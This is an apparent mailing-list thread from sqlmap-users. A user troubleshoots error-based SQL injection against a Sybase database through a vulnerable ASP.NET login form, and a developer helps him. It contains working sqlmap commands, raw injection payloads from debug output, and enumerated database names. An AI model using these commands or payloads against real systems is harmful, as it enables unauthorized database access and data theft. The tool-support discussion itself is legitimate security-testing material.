Re: [sqlmap-users] sqlmap with Sybase
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] sqlmap with Sybase
|
From: Miroslav S. <mir...@gm...> - 2014-03-25 18:59:58
|
Strange thing is that you are not getting anything with --parse-errors as you are dealing with a "missing database" problem inlined with error-based technique. Can you please send a traffic file (if you want you can send it privately to me) for that same run (where you've used --parse-errors)? Bye On Tue, Mar 25, 2014 at 7:55 PM, Richard Whitcroft <rwh...@gm...>wrote: > Sure. The --parse-errors switch doesn't seem to produce anything > additional? I added -v3 just in case. > > -- > $ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8 > --fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3 > > sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 14:46:47 > > [14:46:47] [DEBUG] cleaning up configuration parameters > [14:46:47] [DEBUG] setting the HTTP timeout > [14:46:47] [DEBUG] setting the HTTP method to POST > [14:46:47] [DEBUG] creating HTTP requests opener object > [14:46:47] [DEBUG] forcing back-end DBMS to user defined value > [14:46:47] [INFO] testing connection to the target URL > [14:46:47] [DEBUG] declared web page charset 'utf-8' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: POST > Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox > Type: error-based > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > clause > Payload: ... > Vector: AND [RANDNUM]=CONVERT(INT,(SELECT > '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) > --- > [14:46:47] [INFO] testing Sybase > [14:46:47] [PAYLOAD] rw8...@gm...' AND 6746=CONVERT(INT,(SELECT > CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN > (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea > [14:46:48] [WARNING] reflective value(s) found and filtering out > [14:46:48] [DEBUG] performed 1 queries in 0.47 seconds > [14:46:48] [INFO] confirming Sybase > [14:46:48] [PAYLOAD] rw8...@gm...' AND 6332=CONVERT(INT,(SELECT > CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN > (suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO > [14:46:48] [DEBUG] performed 1 queries in 0.45 seconds > [14:46:48] [INFO] the back-end DBMS is Sybase > web server operating system: Windows Vista > web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0 > back-end DBMS: Sybase > [14:46:48] [INFO] fetching tables for database: ENERGY_MASTER > [14:46:48] [PAYLOAD] rw8...@gm...' AND 5371=CONVERT(INT,(SELECT > CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT > ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM > ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS > Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET > [14:46:49] [DEBUG] performed 1 queries in 0.46 seconds > [14:46:49] [WARNING] in case of continuous data retrieval problems you are > advised to try a switch '--no-cast' or switch '--hex' > No tables found > [14:46:49] [INFO] fetched data logged to text files under > '/opt/sqlmap/output/xxx' > > [*] shutting down at 14:46:49 > -- > > $ python sqlmap.py ... --dbs > > [14:50:13] [INFO] testing Sybase > [14:50:14] [WARNING] reflective value(s) found and filtering out > [14:50:14] [INFO] confirming Sybase > [14:50:14] [INFO] the back-end DBMS is Sybase > web server operating system: Windows Vista > web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0 > back-end DBMS: Sybase > [14:50:14] [INFO] fetching database names > [14:50:14] [INFO] retrieved: 13 > [14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name' > [14:50:15] [INFO] retrieved: 13 > [14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row > data > [14:50:15] [INFO] retrieved: AR1 > [14:50:16] [INFO] retrieved: AR10 > [14:50:16] [INFO] retrieved: AR100TST > [14:50:17] [INFO] retrieved: AR15 > [14:50:17] [INFO] retrieved: AR710 > [14:50:18] [INFO] retrieved: AR710TST > [14:50:18] [INFO] retrieved: ENERGY_MASTER > [14:50:19] [INFO] retrieved: master > [14:50:20] [INFO] retrieved: model > [14:50:20] [INFO] retrieved: olympus > [14:50:21] [INFO] retrieved: sybsystemdb > [14:50:21] [INFO] retrieved: sybsystemprocs > [14:50:22] [INFO] retrieved: tempdb > > > > On 25 March 2014 14:22, Miroslav Stampar <mir...@gm...>wrote: > >> Hi. >> >> Can you please copy/paste the console output you get for sqlmap run with: >> >> python sqlmap.py ... -D ENERGY --tables --parse-errors >> >> Also, for: >> >> python sqlmap.py ... --dbs >> >> Bye >> On Mar 25, 2014 7:16 PM, "les paul" <rw8...@gm...> wrote: >> >>> Hi all, >>> >>> I'm running into trouble with sqlmap against a Sybase db. Here's the >>> fingerprint: >>> >>> Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise >>> Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010 >>> >>> The technique I'm using is error-based through a POST to a vulnerable >>> .aspx page. I am able to enumerate the master db, but not the user tables, >>> which are what I want. >>> >>> $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" >>> --dbms=sybase --threads=8 --batch --technique=E -D master --tables >>> >>> This produces 58 tables, mostly sys* and some mon* which seem standard. >>> I can dump the sysobjects table using -D and -T, etc. >>> >>> The web app is querying a database we'll call "ENERGY". If I try to "-D >>> ENERGY --tables", I get "No tables found, try using --hex or --no-cast >>> blahblah" (which don't work). >>> >>> I used -v4 to look closely at the requests, and see sqlmap is prefixing >>> the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after >>> experimenting I found doesn't work, so I wrote a small tamper script to >>> strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names >>> from the user tables (type='U'), but I'm still not able to get at the >>> actual data/rows in the tables. >>> >>> I know it must be possible because the web app is definitely querying >>> the tables to validate a login (this is a sqli vuln in a login form, heh). >>> >>> I'm not even sure this is really a bug in sqlmap - maybe something odd >>> in the way the database is built or something. I just thought I'd ask in >>> case anyone has had success using sqlmap against a similar Sybase db and >>> has some tips or suggestions. >>> >>> Thanks for reading - I can provide more information if anyone's >>> interested. >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and >>> their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> > -- Miroslav Stampar http://about.me/stamparm |
